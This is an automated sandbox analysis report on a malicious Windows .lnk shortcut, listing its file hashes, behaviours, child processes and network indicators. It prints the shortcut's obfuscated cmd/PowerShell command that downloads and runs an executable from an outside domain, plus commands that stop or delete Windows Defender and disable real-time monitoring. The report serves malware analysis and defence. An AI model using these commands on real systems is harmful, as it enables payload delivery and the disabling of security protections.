analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

GFHN-939742107.lnk

Full analysis: https://app.any.run/tasks/8009ac78-fde1-4741-8b42-bb296ae7999c
Verdict: Malicious activity
Analysis date: May 20, 2019, 22:27:22
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/octet-stream
File info: MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Sat Jul 16 10:42:36 2016, mtime=Sat Jul 16 10:42:36 2016, atime=Sat Jul 16 10:42:36 2016, length=232960, window=hidenormalshowminimized
MD5:

954B01B21DE22E548FF017FE6F9C87F5

SHA1:

DDA12DB2AFEC6634068929953F4F215EB777FDF5

SHA256:

6FC8D4FB7212101A70AA12D81123C7737470491052167A8A69C619AD40748AB3

SSDEEP:

3072:qxyFZZO3D55hYnQtWf6Bv0S5AbG5YJDlejEjQ7IDu2b6SaC:uEOHhf5h0S4rJjAIuJjC

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • D.exe (PID: 3984)
      • D.exe (PID: 3968)
      • D.exe (PID: 3448)

    • Executes PowerShell scripts

      • cmd.exe (PID: 3364)
      • cmd.exe (PID: 3520)
      • cmd.exe (PID: 3372)
      • cmd.exe (PID: 1012)

    • Stops/Deletes Windows Defender service via SC.exe

      • cmd.exe (PID: 916)
      • cmd.exe (PID: 2492)
      • cmd.exe (PID: 3988)
      • cmd.exe (PID: 3228)
      • cmd.exe (PID: 2492)
      • cmd.exe (PID: 2160)
      • cmd.exe (PID: 2152)
      • cmd.exe (PID: 2792)
      • cmd.exe (PID: 2188)
      • cmd.exe (PID: 1684)

    • Disables Windows Defender Real-time monitoring

      • D.exe (PID: 3968)
      • D.exe (PID: 3448)

    • Known privilege escalation attack

      • DllHost.exe (PID: 3812)

    • Loads the Task Scheduler COM API

      • D.exe (PID: 3968)
      • D.exe (PID: 3448)

  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3516)
      • powershell.exe (PID: 3524)
      • powershell.exe (PID: 1240)
      • powershell.exe (PID: 4020)
      • powershell.exe (PID: 2632)
      • D.exe (PID: 3968)
      • D.exe (PID: 3448)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3516)
      • D.exe (PID: 3968)

    • Starts CMD.EXE for commands execution

      • D.exe (PID: 3984)
      • D.exe (PID: 3968)
      • D.exe (PID: 3448)

    • Executes PowerShell scripts

      • cmd.exe (PID: 1900)
      • cmd.exe (PID: 2656)

    • Executed via COM

      • DllHost.exe (PID: 3812)

    • Executed via Task Scheduler

      • D.exe (PID: 3448)

    • Creates files in the program directory

      • D.exe (PID: 3448)

  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

Flags: IDList, LinkInfo, Description, RelativePath, WorkingDir, CommandArgs, IconFile, Unicode, ExpString, ExpIcon, TargetMetadata
FileAttributes: Archive
CreateDate: 2016:07:16 13:42:36+02:00
AccessDate: 2016:07:16 13:42:36+02:00
ModifyDate: 2016:07:16 13:42:36+02:00
TargetFileSize: 232960
IconIndex: (none)
RunWindow: Show Minimized No Activate
HotKey: (none)
TargetFileDOSName: cmd.exe
DriveType: Fixed Disk
VolumeLabel: New1
LocalBasePath: C:\Windows\System32\cmd.exe
Description: qqqqqqqqqqq1qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq
RelativePath: ..\..\..\Windows\System32\cmd.exe
WorkingDirectory: C:\Windows\system32
CommandLineArguments: /C set o=HttPs:/&powershEll "$sd=new-object system.nEt.weBcliEnt;$sd.doWnloAdfIle($env:o+'/www.braintrainersuk.com/ONOLTDA-GD.exe',$env:tmp+'\D.exe');"&"%programfiles%\wiNDows nt\accESsorIes\wORdpaD" c:\pagefIle.syS&%tmp%/d&J34HH&E34JSH_d+&df
IconFileName: C:\Windows\notepad.exe
MachineID: genisys
FillAttributes: 0xff
PopupFillAttributes: 0xff
ScreenBufferSize: 2 x 9002
WindowSize: 2 x 2
WindowOrigin: 2 x 3
FontSize: 0 x 5
FontFamily: Unknown (0x36)
FontWeight: 400
FontName: Lucida Console
CursorSize: 50
FullScreen: No
QuickEdit: Yes
InsertMode: Yes
WindowOriginAuto: No
HistoryBufferSize: 51
NumHistoryBuffers: 5
RemoveHistoryDuplicates: No
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
87
Monitored processes
37
Malicious processes
8
Suspicious processes
10

Behavior graph

Click at the process to see the details
start cmd.exe no specs powershell.exe wordpad.exe no specs d.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe no specs cmd.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs cmd.exe no specs cmd.exe no specs sc.exe no specs powershell.exe no specs CMSTPLUA no specs d.exe cmd.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe no specs sc.exe no specs cmd.exe no specs sc.exe no specs sc.exe no specs cmd.exe no specs cmd.exe no specs sc.exe no specs powershell.exe no specs d.exe cmd.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe no specs sc.exe no specs sc.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3364"C:\Windows\System32\cmd.exe" /C set o=HttPs:/&powershEll "$sd=new-object system.nEt.weBcliEnt;$sd.doWnloAdfIle($env:o+'/www.braintrainersuk.com/ONOLTDA-GD.exe',$env:tmp+'\D.exe');"&"C:\Program Files\wiNDows nt\accESsorIes\wORdpaD" c:\pagefIle.syS&C:\Users\admin\AppData\Local\Temp/d&J34HH&E34JSH_d+&dfC:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3516powershEll "$sd=new-object system.nEt.weBcliEnt;$sd.doWnloAdfIle($env:o+'/www.braintrainersuk.com/ONOLTDA-GD.exe',$env:tmp+'\D.exe');"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2732"C:\Program Files\wiNDows nt\accESsorIes\wORdpaD" c:\pagefIle.sySC:\Program Files\wiNDows nt\accESsorIes\wordpad.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Wordpad Application
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3984C:\Users\admin\AppData\Local\Temp/dC:\Users\admin\AppData\Local\Temp\D.execmd.exe
User:
admin
Company:
NVIDIA Corporation
Integrity Level:
MEDIUM
Description:
NVIDIA PTX JIT Compiler, Version 430.39
Exit code:
0
Version:
26.21.14.3039
3520"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableRealtimeMonitoring $trueC:\Windows\System32\cmd.exeD.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2492"C:\Windows\System32\cmd.exe" /c sc stop WinDefendC:\Windows\System32\cmd.exeD.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
5
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
916"C:\Windows\System32\cmd.exe" /c sc delete WinDefendC:\Windows\System32\cmd.exeD.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
5
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3524powershell Set-MpPreference -DisableRealtimeMonitoring $trueC:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3228/c sc stop WinDefendC:\Windows\system32\cmd.exeD.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
5
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2856sc stop WinDefendC:\Windows\system32\sc.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
A tool to aid in developing services for WindowsNT
Exit code:
5
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 681
Read events
1 343
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
14
Text files
1
Unknown types
0

Dropped files

PID
Process
Filename
Type
3516powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AUG9VL501JYPKW9JG2TR.temp
MD5:
SHA256:
3524powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TK6U4UKEOW8QE9POMXDK.temp
MD5:
SHA256:
1240powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YI512LDFYS1I2SGS2UE5.temp
MD5:
SHA256:
4020powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8GII292RNXQ5CZMNKOV9.temp
MD5:
SHA256:
2632powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FJWQ8C2ZHGCMF03MFL5O.temp
MD5:
SHA256:
3516powershell.exeC:\Users\admin\AppData\Local\Temp\D.exeexecutable
MD5:E6DBE5E47DAB3B586A10F9B2BFD4312A
SHA256:A742DD1829BF43E23262D378D8E5219C5C9DA60C28BBC3C063274AAD4B961171
3524powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF120642.TMPbinary
MD5:131DC75F6D4142CA9244945A91A71E8D
SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4
1240powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF120a87.TMPbinary
MD5:131DC75F6D4142CA9244945A91A71E8D
SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4
3968D.exeC:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\0f5007522459c86e95ffcc62f32308f1_90059c37-1320-41a4-b58d-2b75a9850d2fbinary
MD5:83EB50EA90A2F2595538D05631212A90
SHA256:488EA3EA13EB8603CCB5A25641944F5A34AF1A9DA5B8C51D4549152CA16FCA53
3516powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF11ec12.TMPbinary
MD5:131DC75F6D4142CA9244945A91A71E8D
SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
3
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3448
D.exe
51.83.138.135:443
GB
unknown
3516
powershell.exe
68.66.248.28:443
www.braintrainersuk.com
A2 Hosting, Inc.
US
suspicious

DNS requests

Domain
IP
Reputation
www.braintrainersuk.com
  • 68.66.248.28
malicious

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
GFHN-939742107.lnk